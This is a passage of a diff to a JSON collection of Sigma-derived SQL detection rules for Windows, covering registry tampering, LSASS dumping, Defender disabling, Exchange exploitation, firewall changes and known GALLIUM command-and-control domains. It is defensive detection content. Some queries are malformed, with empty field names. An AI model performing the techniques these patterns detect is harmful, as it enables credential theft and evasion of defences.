'%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('30803', '30804', '30806') AND NOT (((ServerAddress LIKE '10.%' ESCAPE '\\' OR ServerAddress LIKE '192.168.%' ESCAPE '\\' OR ServerAddress LIKE '172.16.%' ESCAPE '\\' OR ServerAddress LIKE '172.17.%' ESCAPE '\\' OR ServerAddress LIKE '172.18.%' ESCAPE '\\' OR ServerAddress LIKE '172.19.%' ESCAPE '\\' OR ServerAddress LIKE '172.20.%' ESCAPE '\\' OR ServerAddress LIKE '172.21.%' ESCAPE '\\' OR ServerAddress LIKE '172.22.%' ESCAPE '\\' OR ServerAddress LIKE '172.23.%' ESCAPE '\\' OR ServerAddress LIKE '172.24.%' ESCAPE '\\' OR ServerAddress LIKE '172.25.%' ESCAPE '\\' OR ServerAddress LIKE '172.26.%' ESCAPE '\\' OR ServerAddress LIKE '172.27.%' ESCAPE '\\' OR ServerAddress LIKE '172.28.%' ESCAPE '\\' OR ServerAddress LIKE '172.29.%' ESCAPE '\\' OR ServerAddress LIKE '172.30.%' ESCAPE '\\' OR ServerAddress LIKE '172.31.%' ESCAPE '\\' OR ServerAddress LIKE '127.%' ESCAPE '\\' OR ServerAddress LIKE '169.254.%' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_ifilter.yml" + "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "MSExchange Transport Agent Installation - Builtin", + "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "status": "test", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "win_exchange_transportagent.yml" }, { - "title": "Potential Persistence Via Event Viewer Events.asp", - "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", "status": "test", - "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND NewValue LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND NewValue LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (NewValue = 'http://go.microsoft.com/fwlink/events.asp') OR (NewValue = '(Empty)')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_persistence_event_viewer_events_asp.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "COM Hijacking via TreatAs", - "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "status": "experimental", - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", - "author": "frack113", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.lateral_movement", + "attack.t1210" ], "falsepositives": [ - "Legitimate use" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_treatas_persistence.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Registry Explorer Policy Modification", - "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "author": "frack113", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_set_nopolicies_user.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Suspicious Application Installed", + "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "Administrator actions" + "Packages or applications being legitimately used by users or administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" + "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_windows_defender_service.yml" + "filename": "win_shell_core_susp_packages_installed.yml" }, { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", + "title": "Scheduled Task Executed Uncommon LOLBIN", + "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "status": "experimental", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.004" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Scheduled Task Executed From A Suspicious Location", + "id": "424273ea-7cf8-43a6-b712-375f925e481f", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_taskscheduler_execution_from_susp_locations.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "status": "experimental", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Tamper Protection on Windows Defender", - "id": "93d298a1-d28f-47f1-a468-d971e7796679", - "status": "experimental", - "description": "Detects disabling Windows Defender Tamper Protection", - "author": "Austin Songer @austinsonger", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "status": "test", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "title": "New Firewall Rule Added In Windows Firewall Exception List", + "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "description": "Detects when a rule has been added to the Windows Firewall exception list", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], + "filename": "win_firewall_as_add_rule.yml" + }, + { + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "Disable Internal Tools or Feature in Registry", - "id": "e2482f8d-3443-4237-b906-cc145d87a076", + "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", + "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "status": "experimental", - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Legitimate admin script" - ], + "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", + "author": "frack113", "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2006', '2052') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disable_function_user.yml" + "filename": "win_firewall_as_delete_rule.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the 